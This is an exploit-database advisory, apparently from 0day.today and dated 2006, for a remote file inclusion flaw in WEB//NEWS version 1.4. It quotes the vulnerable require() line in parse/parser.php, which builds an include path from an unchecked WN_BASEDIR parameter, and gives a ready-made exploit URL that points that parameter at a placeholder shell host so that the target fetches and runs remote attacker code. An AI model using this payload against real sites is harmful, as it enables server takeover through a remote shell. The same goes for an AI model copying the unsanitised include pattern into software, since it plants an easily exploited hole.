id: 891
date: 09/26/2006
title: WEB//NEWS <= 1.4 (parser.php) Remote File Include Vulnerability
author: ThE-WoLf-KsA
cves: 

===============================================================
WEB//NEWS <= 1.4 (parser.php) Remote File Include Vulnerability
===============================================================




#==============================================================================================
#webnews <= v1.4 (WN_BASEDIR) Remote File Inclusion Exploit
#===============================================================================================
#
#Critical Level : Dangerous
#
#
#
#Version : v1.4
#
#================================================================================================
#Bug in : parse/parser.php
#
#Vlu Code :
#--------------------------------
#
#            require($WN_BASEDIR."/parse/parser.php");
#
#
#================================================================================================
#
#Exploit :
#--------------------------------
#
#htpp://sitename.com[scerpitPath]/parse/parser.php?WN_BASEDIR=http://SHELLURL.COM
#
#================================================================================================
#Discoverd By : ThE-WoLf-KsA
#XP10_hackEr Team
==================================================================================================



#  0day.today [2023-03-26]  #